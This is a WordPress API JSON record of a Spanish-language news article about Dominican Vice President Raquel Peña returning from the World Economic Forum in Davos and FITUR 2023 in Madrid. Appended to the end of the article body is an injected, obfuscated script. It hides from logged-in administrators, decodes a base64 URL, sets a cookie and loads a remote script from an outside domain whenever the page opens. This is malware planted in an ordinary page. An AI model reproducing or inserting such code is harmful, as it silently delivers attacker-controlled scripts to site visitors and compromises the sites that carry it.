{"id":13513,"date":"2023-01-21T11:54:53","date_gmt":"2023-01-21T15:54:53","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13513"},"modified":"2023-01-21T11:54:53","modified_gmt":"2023-01-21T15:54:53","slug":"vicepresidenta-raquel-pena-retorna-al-pais-tras-agotar-agenda-en-foro-economico-mundial-y-fitur-2023","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13513","title":{"rendered":"Vicepresidenta Raquel Pe\u00f1a retorna al pa\u00eds tras agotar agenda en Foro Econ\u00f3mico Mundial y FITUR 2023"},"content":{"rendered":"<p>Santo Domingo.- Tras agotar su agenda en la\u00a0<strong>Reuni\u00f3n Anual del Foro Econ\u00f3mico Mundial 2023<\/strong>, celebrado en Davos, Suiza, y visitar la\u00a0<strong>Feria Internacional de Turismo<\/strong>\u00a0<strong>(FITUR),<\/strong>\u00a0en Madrid, Espa\u00f1a, donde tuvo la oportunidad de proyectar al pa\u00eds a nivel internacional y fortalecer las relaciones con diferentes pa\u00edses, la\u00a0<strong>Vicepresidenta de la Rep\u00fablica, Raquel Pe\u00f1a, retorn\u00f3 al pa\u00eds<\/strong>\u00a0la noche de este viernes por el Aeropuerto Internacional de las Am\u00e9ricas (AILA).<\/p>\n<p>Durante su participaci\u00f3n en Davos, Suiza, la vicemandataria mostr\u00f3 y\u00a0<strong>proyect\u00f3 el pa\u00eds como uno de los mejores destinos para los inversionistas<\/strong>, adem\u00e1s de fortalecer el contacto con grandes funcionarios de todo el mundo y personas de influencia a nivel internacional.<\/p>\n<p><em>\u201cNosotros llevamos muchos proyectos y oportunidades para hacer crecer el pa\u00eds. Estamos en un momento espectacular gracias al buen manejo de la econom\u00eda dirigida por el Presidente Luis Abinader y por una serie de estrategias que se han aplicado ante situaciones adversas que han ocurrido\u201d,<\/em>\u00a0precis\u00f3 Pe\u00f1a.<\/p>\n<p>Dentro de las acciones implementadas por el Gobierno dominicano y que fueron presentadas por Pe\u00f1a en Davos, est\u00e1 el\u00a0<strong>apoyo que se ha dado a los<\/strong>\u00a0<strong>emprendedores<\/strong>\u00a0para que surjan nuevas empresas y las que existen puedan ser m\u00e1s s\u00f3lidas a trav\u00e9s de\u00a0<strong>financiamientos blandos otorgados por el Estado.<\/strong><\/p>\n<p>Pe\u00f1a explic\u00f3 que las\u00a0<strong>micro, peque\u00f1as y medianas empresas (mipymes) representan el 98 %\u00a0<\/strong>de las empresas del pa\u00eds, aportando m\u00e1s del 50 % de la fuerza de trabajo y por encima del 42 % al Producto Interno Bruto (PIB) y todo eso ha sido con base en el\u00a0<strong>apoyo del Presidente Luis Abinader.<\/strong><\/p>\n<p><strong>Turismo responsable<\/strong><\/p>\n<p>En la Reuni\u00f3n Anual del Foro Econ\u00f3mico Mundial tambi\u00e9n se trat\u00f3 el tema del\u00a0<strong>turismo responsable<\/strong>. La vicemandataria asegur\u00f3 que tras escuchar todo lo relacionado con este tema pudo confirmar que<strong>\u00a0en el pa\u00eds se est\u00e1 llevando el crecimiento y desarrollo del turismo en esa l\u00ednea.<\/strong><\/p>\n<p><em>\u201cNosotros contamos con unos empresarios tur\u00edsticos que han entendido la necesidad de desarrollar el turismo de manera responsable y sostenible, porque es la \u00fanica manera que les va a garantizar a ellos que sus negocios sigan creciendo. Ya la mayor\u00eda de los turistas est\u00e1n conscientes de esto y exigen que los lugares donde vayan cumplan con esos requerimientos\u201d,\u00a0<\/em>puntualiz\u00f3.<\/p>\n<p>Precis\u00f3, adem\u00e1s, que otro de los t\u00f3picos tratados fue dar\u00a0<strong>condiciones especiales para las empresas tur\u00edsticas que s\u00ed cuidan el medio ambiente.<\/strong><\/p>\n<p><strong>FITUR<\/strong><\/p>\n<p>A su llegada a FITUR, Pe\u00f1a, quien tambi\u00e9n es la presidenta del\u00a0<strong>Gabinete de Promoci\u00f3n de Inversiones<\/strong>, dijo que actualmente el pa\u00eds es atractivo para los extranjeros, porque el Presidente Abinader ha hecho que en Rep\u00fablica Dominicana se disfrute de\u00a0<strong>paz social<\/strong>\u00a0y, sobre todo, se respete el\u00a0<strong>marco jur\u00eddico de las inversiones.<\/strong><\/p>\n<p><em>\u201cAl manejar el Gabinete de Inversiones, s\u00e9 lo c\u00f3modos y contentos que se sienten los inversionistas de seguir desarrollando sus proyectos en el pa\u00eds, porque ese es el reflejo de c\u00f3mo el Presidente sigue manejando el pa\u00eds y c\u00f3mo nos ven desde afuera\u201d,<\/em>\u00a0explic\u00f3 la vicemandataria.<\/p>\n<p>A\u00f1adi\u00f3 que\u00a0<strong>el Gobierno convierte las situaciones adversas en buenas oportunidades<\/strong>\u00a0para el seguir desarrollando el pa\u00eds.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.- Tras agotar su agenda en la\u00a0Reuni\u00f3n Anual del Foro Econ\u00f3mico Mundial 2023, celebrado en Davos, Suiza, y visitar la\u00a0Feria Internacional de Turismo\u00a0(FITUR),\u00a0en Madrid, Espa\u00f1a, donde tuvo la oportunidad de proyectar al pa\u00eds a nivel internacional y fortalecer las relaciones con diferentes pa\u00edses, la\u00a0Vicepresidenta de la Rep\u00fablica, Raquel Pe\u00f1a, retorn\u00f3 al pa\u00eds\u00a0la noche de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13515,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13513","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13513","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13513"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13513\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13515"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13513"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13513"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13513"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}